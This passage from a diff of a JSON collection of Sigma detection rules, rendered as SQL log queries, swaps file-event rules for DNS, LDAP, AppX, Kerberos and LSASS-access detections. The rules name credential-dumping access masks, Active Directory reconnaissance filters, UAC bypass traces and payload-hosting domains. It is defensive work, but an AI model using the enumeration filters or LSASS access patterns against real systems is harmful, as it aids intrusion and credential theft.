'%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\Update.exe' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\stage\\\\Teams.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\stage\\\\Squirrel.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\SquirrelTemp\\\\tempb\\\\' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\mscorsvw.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Windows\\\\assembly\\\\NativeImages\\_%' ESCAPE '\\') OR (Image LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\.vscode\\\\extensions\\\\%' ESCAPE '\\') OR (Image LIKE '%\\\\AppData\\\\Local\\\\GitHubDesktop\\\\Update.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\SquirrelTemp\\\\%' ESCAPE '\\') OR (TargetFilename LIKE 'C:\\\\WINDOWS\\\\TEMP\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-DNS Client Events/Operational' AND EventID = '3008' AND QueryName LIKE '%.anonfiles.com%' ESCAPE '\\')" ], - "filename": "file_event_win_susp_dropper.yml" + "filename": "win_dns_client_anonymfiles_com.yml" }, { - "title": "File Creation In Suspicious Directory By Msdt.EXE", - "id": "318557a5-150c-4c8d-b70e-a9910e199857", + "title": "Potential Active Directory Reconnaissance/Enumeration Via LDAP", + "id": "31d68132-4038-47c7-8f8e-635a39a7c174", + "status": "test", + "description": "Detects potential Active Directory enumeration via LDAP", + "author": "Adeem Mawani", + "tags": [ + "attack.discovery", + "attack.t1069.002", + "attack.t1087.002", + "attack.t1482" + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE (((EventID = '30' AND (SearchFilter LIKE '%(groupType:1.2.840.113556.1.4.803:=2147483648)%' ESCAPE '\\' OR SearchFilter LIKE '%(groupType:1.2.840.113556.1.4.803:=2147483656)%' ESCAPE '\\' OR SearchFilter LIKE '%(groupType:1.2.840.113556.1.4.803:=2147483652)%' ESCAPE '\\' OR SearchFilter LIKE '%(groupType:1.2.840.113556.1.4.803:=2147483650)%' ESCAPE '\\' OR SearchFilter LIKE '%(sAMAccountType=805306369)%' ESCAPE '\\' OR SearchFilter LIKE '%(sAMAccountType=805306368)%' ESCAPE '\\' OR SearchFilter LIKE '%(sAMAccountType=536870913)%' ESCAPE '\\' OR SearchFilter LIKE '%(sAMAccountType=536870912)%' ESCAPE '\\' OR SearchFilter LIKE '%(sAMAccountType=268435457)%' ESCAPE '\\' OR SearchFilter LIKE '%(sAMAccountType=268435456)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectCategory=groupPolicyContainer)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectCategory=organizationalUnit)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectCategory=Computer)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectCategory=nTDSDSA)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectCategory=server)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectCategory=domain)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectCategory=person)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectCategory=group)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectCategory=user)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectClass=trustedDomain)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectClass=computer)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectClass=server)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectClass=group)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectClass=user)%' ESCAPE '\\' OR SearchFilter LIKE '%(primaryGroupID=521)%' ESCAPE '\\' OR SearchFilter LIKE '%(primaryGroupID=516)%' ESCAPE '\\' OR SearchFilter LIKE '%(primaryGroupID=515)%' ESCAPE '\\' OR SearchFilter LIKE '%(primaryGroupID=512)%' ESCAPE '\\' OR SearchFilter LIKE '%Domain Admins%' ESCAPE '\\' OR SearchFilter LIKE '%objectGUID=\\*' ESCAPE '\\' OR SearchFilter LIKE '%(schemaIDGUID=\\*)%' ESCAPE '\\')) AND NOT (EventID = '30' AND (SearchFilter LIKE '%(domainSid=%)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectSid=%)%' ESCAPE '\\'))) OR (EventID = '30' AND (SearchFilter LIKE '%(userAccountControl:1.2.840.113556.1.4.803:=4194304)%' ESCAPE '\\' OR SearchFilter LIKE '%(userAccountControl:1.2.840.113556.1.4.803:=2097152)%' ESCAPE '\\' OR SearchFilter LIKE '%!(userAccountControl:1.2.840.113556.1.4.803:=1048574)%' ESCAPE '\\' OR SearchFilter LIKE '%(userAccountControl:1.2.840.113556.1.4.803:=524288)%' ESCAPE '\\' OR SearchFilter LIKE '%(userAccountControl:1.2.840.113556.1.4.803:=65536)%' ESCAPE '\\' OR SearchFilter LIKE '%(userAccountControl:1.2.840.113556.1.4.803:=8192)%' ESCAPE '\\' OR SearchFilter LIKE '%(userAccountControl:1.2.840.113556.1.4.803:=544)%' ESCAPE '\\' OR SearchFilter LIKE '%!(UserAccountControl:1.2.840.113556.1.4.803:=2)%' ESCAPE '\\' OR SearchFilter LIKE '%msDS-AllowedToActOnBehalfOfOtherIdentity%' ESCAPE '\\' OR SearchFilter LIKE '%msDS-AllowedToDelegateTo%' ESCAPE '\\' OR SearchFilter LIKE '%msDS-GroupManagedServiceAccount%' ESCAPE '\\' OR SearchFilter LIKE '%(accountExpires=9223372036854775807)%' ESCAPE '\\' OR SearchFilter LIKE '%(accountExpires=0)%' ESCAPE '\\' OR SearchFilter LIKE '%(adminCount=1)%' ESCAPE '\\' OR SearchFilter LIKE '%ms-MCS-AdmPwd%' ESCAPE '\\')))" + ], + "filename": "win_ldap_recon.yml" + }, + { + "title": "Suspicious AppX Package Locations", + "id": "5cdeaf3d-1489-477c-95ab-c318559fc051", "status": "experimental", - "description": "Detects msdt.exe creating files in suspicious directories which could be a sign of exploitation of either Follina or Dogwalk vulnerabilities", - "author": "Vadim Varganov, Florian Roth (Nextron Systems)", + "description": "Detects an appx package added the pipeline of the \"to be processed\" packages which is located in suspicious locations", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1547.001", - "cve.2022.30190" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\msdt.exe' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\PerfLogs\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-AppXDeploymentServer/Operational' AND EventID = '854' AND (Path LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Path LIKE '%/users/public/%' ESCAPE '\\' OR Path LIKE '%C:\\\\PerfLogs\\\\%' ESCAPE '\\' OR Path LIKE '%C:/perflogs/%' ESCAPE '\\' OR Path LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR Path LIKE '%/desktop/%' ESCAPE '\\' OR Path LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR Path LIKE '%/Downloads/%' ESCAPE '\\' OR Path LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR Path LIKE '%C:/Windows/Temp/%' ESCAPE '\\' OR Path LIKE '%\\\\AppdData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR Path LIKE '%/AppdData/Local/Temp/%' ESCAPE '\\'))" ], - "filename": "file_event_win_msdt_susp_directories.yml" + "filename": "win_appxdeployment_server_susp_package_locations.yml" }, { - "title": "Windows Binaries Write Suspicious Extensions", - "id": "b8fd0e93-ff58-4cbd-8f48-1c114e342e62", + "title": "Deployment Of The AppX Package Was Blocked By The Policy", + "id": "e021bbb5-407f-41f5-9dc9-1864c45a7a51", "status": "experimental", - "description": "Detects windows executables that writes files with suspicious extensions", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects an appx package deployment that was blocked by the local computer policy", + "author": "frack113", + "tags": [ + "attack.defense_evasion" + ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\smss.exe' ESCAPE '\\' OR Image LIKE '%\\\\RuntimeBroker.exe' ESCAPE '\\' OR Image LIKE '%\\\\sihost.exe' ESCAPE '\\' OR Image LIKE '%\\\\lsass.exe' ESCAPE '\\' OR Image LIKE '%\\\\csrss.exe' ESCAPE '\\' OR Image LIKE '%\\\\winlogon.exe' ESCAPE '\\' OR Image LIKE '%\\\\wininit.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.txt' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.hta' ESCAPE '\\' OR TargetFilename LIKE '%.iso' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\')) OR ((Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\svchost.exe' ESCAPE '\\' OR Image LIKE '%\\\\dllhost.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.hta' ESCAPE '\\' OR TargetFilename LIKE '%.iso' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-AppXDeploymentServer/Operational' AND EventID IN ('441', '442', '453', '454'))" ], - "filename": "file_event_win_shell_write_susp_files_extensions.yml" + "filename": "win_appxdeployment_server_policy_block.yml" }, { - "title": "Suspicious File Drop by Exchange", - "id": "6b269392-9eba-40b5-acb6-55c882b20ba6", + "title": "Deployment AppX Package Was Blocked By AppLocker", + "id": "6ae53108-c3a0-4bee-8f45-c7591a2c337f", "status": "experimental", - "description": "Detects suspicious file type dropped by an Exchange component in IIS", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects an appx package deployment that was blocked by AppLocker policy", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.t1190", - "attack.initial_access", - "attack.t1505.003" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\w3wp.exe' ESCAPE '\\' AND CommandLine LIKE '%MSExchange%' ESCAPE '\\' AND (TargetFilename LIKE '%.aspx' ESCAPE '\\' OR TargetFilename LIKE '%.asp' ESCAPE '\\' OR TargetFilename LIKE '%.ashx' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-AppXDeploymentServer/Operational' AND EventID = '412')" ], - "filename": "file_event_win_exchange_webshell_drop_suspicious.yml" + "filename": "win_appxdeployment_server_applocker_block.yml" }, { - "title": "UAC Bypass Using EventVwr", - "id": "63e4f530-65dc-49cc-8f80-ccfa95c69d43", + "title": "Suspicious Remote AppX Package Locations", + "id": "8b48ad89-10d8-4382-a546-50588c410f0d", "status": "experimental", - "description": "Detects the pattern of a UAC bypass using Windows Event Viewer", - "author": "Antonio Cocomazzi (idea), Florian Roth (Nextron Systems)", + "description": "Detects an appx package added the pipeline of the \"to be processed\" packages which is downloaded from a suspicious domain", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE '%\\\\Microsoft\\\\Event Viewer\\\\RecentViews' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Microsoft\\\\EventV~1\\\\RecentViews' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-AppXDeploymentServer/Operational' AND EventID = '854' AND (Path LIKE '%transfer.sh%' ESCAPE '\\' OR Path LIKE '%raw.githubusercontent.com%' ESCAPE '\\' OR Path LIKE '%gist.githubusercontent.com%' ESCAPE '\\' OR Path LIKE '%pastebin.com%' ESCAPE '\\' OR Path LIKE '%cdn.discordapp.com/attachments/%' ESCAPE '\\' OR Path LIKE '%mediafire.com%' ESCAPE '\\' OR Path LIKE '%mega.nz%' ESCAPE '\\' OR Path LIKE '%ddns.net%' ESCAPE '\\' OR Path LIKE '%.paste.ee%' ESCAPE '\\' OR Path LIKE '%.hastebin.com%' ESCAPE '\\' OR Path LIKE '%.ghostbin.co/%' ESCAPE '\\' OR Path LIKE '%ufile.io%' ESCAPE '\\' OR Path LIKE '%storage.googleapis.com%' ESCAPE '\\' OR Path LIKE '%anonfiles.com%' ESCAPE '\\' OR Path LIKE '%send.exploit.in%' ESCAPE '\\' OR Path LIKE '%privatlab.net%' ESCAPE '\\' OR Path LIKE '%privatlab.com%' ESCAPE '\\' OR Path LIKE '%sendspace.com%' ESCAPE '\\' OR Path LIKE '%pastetext.net%' ESCAPE '\\' OR Path LIKE '%pastebin.pl%' ESCAPE '\\' OR Path LIKE '%paste.ee%' ESCAPE '\\'))" ], - "filename": "file_event_win_uac_bypass_eventvwr.yml" + "filename": "win_appxdeployment_server_susp_domains.yml" }, { - "title": "UAC Bypass Using Consent and Comctl32 - File", - "id": "62ed5b55-f991-406a-85d9-e8e8fdf18789", - "status": "test", - "description": "Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22)", - "author": "Christian Burkard (Nextron Systems)", + "title": "Uncommon AppX Package Locations", + "id": "c977cb50-3dff-4a9f-b873-9290f56132f1", + "status": "experimental", + "description": "Detects an appx package added the pipeline of the \"to be processed\" packages which is located in uncommon locations", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\consent.exe.@%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\comctl32.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-AppXDeploymentServer/Operational' AND EventID = '854' AND NOT (((Path LIKE '%C:\\\\Program Files\\\\WindowsApps\\\\%' ESCAPE '\\' OR Path LIKE '%C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR Path LIKE '%C:\\\\Windows\\\\SystemApps\\\\%' ESCAPE '\\' OR Path LIKE '%C:\\\\Windows\\\\PrintDialog\\\\%' ESCAPE '\\' OR Path LIKE '%C:\\\\Windows\\\\ImmersiveControlPanel\\\\%' ESCAPE '\\' OR Path LIKE '%x-windowsupdate://%' ESCAPE '\\' OR Path LIKE '%file:///C:/Program\\%20Files%' ESCAPE '\\')) OR ((Path LIKE '%https://statics.teams.cdn.office.net/%' ESCAPE '\\' OR Path LIKE '%microsoft.com%' ESCAPE '\\'))))" ], - "filename": "file_event_win_uac_bypass_consent_comctl32.yml" + "filename": "win_appxdeployment_server_uncommon_package_locations.yml" }, { - "title": "Office Macro File Creation", - "id": "91174a41-dc8f-401b-be89-7bfc140612a0", + "title": "Suspicious AppX Package Installation Attempt", + "id": "898d5fc9-fbc3-43de-93ad-38e97237c344", "status": "experimental", - "description": "Detects the creation of a new office macro files on the systems", + "description": "Detects an appx package installation with the error code \"0x80073cff\" which indicates that the package didn't meet the signing requirements and could be suspicious", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.initial_access", - "attack.t1566.001" + "attack.defense_evasion" ], "falsepositives": [ - "Very common in environments that rely heavily on macro documents" + "Legitimate AppX packages not signed by MS used part of an enterprise" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE '%.docm' ESCAPE '\\' OR TargetFilename LIKE '%.dotm' ESCAPE '\\' OR TargetFilename LIKE '%.xlsm' ESCAPE '\\' OR TargetFilename LIKE '%.xltm' ESCAPE '\\' OR TargetFilename LIKE '%.potm' ESCAPE '\\' OR TargetFilename LIKE '%.pptm' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-AppXDeploymentServer/Operational' AND EventID = '401' AND ErrorCode = '0x80073cff')" ], - "filename": "file_event_win_office_macro_files_created.yml" + "filename": "win_appxdeployment_server_susp_appx_package_installation.yml" }, { - "title": "Suspicious Creation with Colorcpl", - "id": "e15b518d-b4ce-4410-a9cd-501f23ce4a18", + "title": "Potential Malicious AppX Package Installation Attempts", + "id": "09d3b48b-be17-47f5-bf4e-94e7e75d09ce", "status": "experimental", - "description": "Once executed, colorcpl.exe will copy the arbitrary file to c:\\windows\\system32\\spool\\drivers\\color\\", - "author": "frack113", + "description": "Detects potential installation or installation attempts of known malicious appx packages", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1564" + "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "Rare occasions where a malicious package uses the exact same name and version as a legtimate application" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\colorcpl.exe' ESCAPE '\\' AND NOT (((TargetFilename LIKE '%.icm' ESCAPE '\\' OR TargetFilename LIKE '%.gmmp' ESCAPE '\\' OR TargetFilename LIKE '%.cdmp' ESCAPE '\\' OR TargetFilename LIKE '%.camp' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-AppXDeploymentServer/Operational' AND EventID IN ('400', '401') AND PackageFullName LIKE '%3669e262-ec02-4e9d-bcb4-3d008b4afac9%' ESCAPE '\\')" ], - "filename": "file_event_win_susp_colorcpl.yml" + "filename": "win_appxdeployment_server_mal_appx_names.yml" }, { - "title": "Suspicious Interactive PowerShell as SYSTEM", - "id": "5b40a734-99b6-4b98-a1d0-1cea51a08ab2", - "status": "experimental", - "description": "Detects the creation of files that indicator an interactive use of PowerShell in the SYSTEM user context", - "author": "Florian Roth (Nextron Systems)", + "title": "HybridConnectionManager Service Running", + "id": "b55d23e5-6821-44ff-8a6e-67218891e49f", + "status": "test", + "description": "Rule to detect the Hybrid Connection Manager service running on an endpoint.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "tags": [ + "attack.persistence", + "attack.t1554" + ], "falsepositives": [ - "Administrative activity", - "PowerShell scripts running as SYSTEM user" + "Legitimate use of Hybrid Connection Manager via Azure function apps." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\config\\\\systemprofile\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\PowerShell\\\\PSReadLine\\\\ConsoleHost\\_history.txt' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\config\\\\systemprofile\\\\AppData\\\\Local\\\\Microsoft\\\\Windows\\\\PowerShell\\\\StartupProfileData-Interactive' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-ServiceBus-Client' AND EventID IN ('40300', '40301', '40302') AND (logs MATCH ('\"HybridConnection\" OR \"sb://\" OR \"servicebus.windows.net\" OR \"HybridConnectionManage\"')))" ], - "filename": "file_event_win_susp_system_interactive_powershell.yml" + "filename": "win_hybridconnectionmgr_svc_running.yml" }, { - "title": "New Shim Database Created in the Default Directory", - "id": "ee63c85c-6d51-4d12-ad09-04e25877a947", - "status": "test", - "description": "Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims.\nThe Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time.\n", - "author": "frack113", + "title": "Loading Diagcab Package From Remote Path", + "id": "50cb47b8-2c33-4b23-a2e9-4600657d9746", + "status": "experimental", + "description": "Detects loading of diagcab packages from a remote path, as seen in DogWalk vulnerability", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1547.009" + "attack.execution" ], "falsepositives": [ - "Unknown" + "Legitimate package hosted on a known and authorized remote location" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%.sdb' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Windows\\\\apppatch\\\\Custom\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '101' AND PackagePath LIKE '%\\\\\\\\\\*' ESCAPE '\\')" ], - "filename": "file_event_win_creation_new_shim_database.yml" + "filename": "win_diagnosis_scripted_load_remote_diagcab.yml" }, { - "title": "SafetyKatz Default Dump Filename", - "id": "e074832a-eada-4fd7-94a1-10642b130e16", + "title": "Suspicious Outbound Kerberos Connection - Security", + "id": "eca91c7c-9214-47b9-b4c5-cb1d7e4f2350", "status": "test", - "description": "Detects default lsass dump filename from SafetyKatz", - "author": "Markus Neis", + "description": "Detects suspicious outbound network activity via kerberos default port indicating possible lateral movement or first stage PrivEsc via delegation.", + "author": "Ilyas Ochkov, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.lateral_movement", + "attack.t1558.003" ], "falsepositives": [ - "Rare legitimate files with similar filename structure" + "Web Browsers" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\Temp\\\\debug.bin' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5156' AND DestPort = '88') AND NOT (((Application LIKE 'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\' OR Application LIKE 'C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR Application LIKE 'C:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR Application LIKE 'C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\' OR Application LIKE 'C:\\\\Program Files (x86)\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\'))))" ], - "filename": "file_event_win_hktl_safetykatz.yml" + "filename": "win_security_susp_outbound_kerberos_connection.yml" }, { - "title": "Suspicious Executable File Creation", - "id": "74babdd6-a758-4549-9632-26535279e654", + "title": "VSSAudit Security Event Source Registration", + "id": "e9faba72-4974-4ab2-a4c5-46e25ad59e9b", "status": "experimental", - "description": "Detect creation of suspicious executable file name. Some strings look for suspicious file extensions, others look for filenames that exploit unquoted service paths.", - "author": "frack113", + "description": "Detects the registration of the security event source VSSAudit. It would usually trigger when volume shadow copy operations happen.", + "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR)", "tags": [ - "attack.defense_evasion", - "attack.t1564" + "attack.credential_access", + "attack.t1003.002" ], "falsepositives": [ - "Unknown" + "Legitimate use of VSSVC. Maybe backup operations. It would usually be done by C:\\Windows\\System32\\VSSVC.exe." ], - "level": "high", + "level": "informational", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%.bat.exe' ESCAPE '\\' OR TargetFilename LIKE '%.sys.exe' ESCAPE '\\') OR (TargetFilename LIKE 'C:\\\\$Recycle.Bin.exe' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Documents and Settings.exe' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\MSOCache.exe' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Recovery.exe' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\PerfLogs.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND AuditSourceName = 'VSSAudit' AND EventID IN ('4904', '4905'))" ], - "filename": "file_event_win_susp_executable_creation.yml" + "filename": "win_security_vssaudit_secevent_source_registration.yml" }, { - "title": "Pingback Backdoor File Indicators", - "id": "2bd63d53-84d4-4210-80ff-bf0658f1bf78", - "status": "test", - "description": "Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report", - "author": "Bhabesh Raj", + "title": "Generic Password Dumper Activity on LSASS", + "id": "4a1b6da0-d94f-4fc3-98fc-2d9cb9e5ee76", + "status": "experimental", + "description": "Detects process handle on LSASS process with certain access mask", + "author": "Roberto Rodriguez, Teymur Kheirkhabarov, Dimitrios Slamaris, Mark Russinovich, Aleksey Potapov, oscd.community (update)", "tags": [ - "attack.persistence", - "attack.t1574.001" + "attack.credential_access", + "car.2019-04-004", + "attack.t1003.001" ], "falsepositives": [ - "Unlikely" + "Legitimate software accessing LSASS process for legitimate reason; update the whitelist with it" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%updata.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Windows\\\\oci.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4656' AND ObjectName LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (AccessMask LIKE '%0x40%' ESCAPE '\\' OR AccessMask LIKE '%0x1400%' ESCAPE '\\' OR AccessMask LIKE '%0x100000%' ESCAPE '\\' OR AccessMask LIKE '%0x1410%' ESCAPE '\\' OR AccessMask LIKE '%0x1010%' ESCAPE '\\' OR AccessMask LIKE '%0x1438%' ESCAPE '\\' OR AccessMask LIKE '%0x143a%' ESCAPE '\\' OR AccessMask LIKE '%0x1418%' ESCAPE '\\' OR AccessMask LIKE '%0x1f0fff%' ESCAPE '\\' OR AccessMask LIKE '%0x1f1fff%' ESCAPE '\\' OR AccessMask LIKE '%0x1f2fff%' ESCAPE '\\' OR AccessMask LIKE '%0x1f3fff%' ESCAPE '\\')) OR (EventID = '4663' AND ObjectName LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (AccessList LIKE '%4484%' ESCAPE '\\' OR AccessList LIKE '%4416%' ESCAPE '\\'))) AND NOT (((ProcessName LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\taskmgr.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\procexp64.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\procexp.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\lsm.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\csrss.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\wininit.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\vmtoolsd.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\minionhost.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\VsTskMgr.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\thor.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\thor64.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\MicrosoftEdgeUpdate.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\GamingServices.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\MsMpEng.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\MRT.exe' ESCAPE '\\' OR ProcessName LIKE '%RtkAudUService64' ESCAPE '\\') AND (ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\SysWow64\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\SysNative\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR 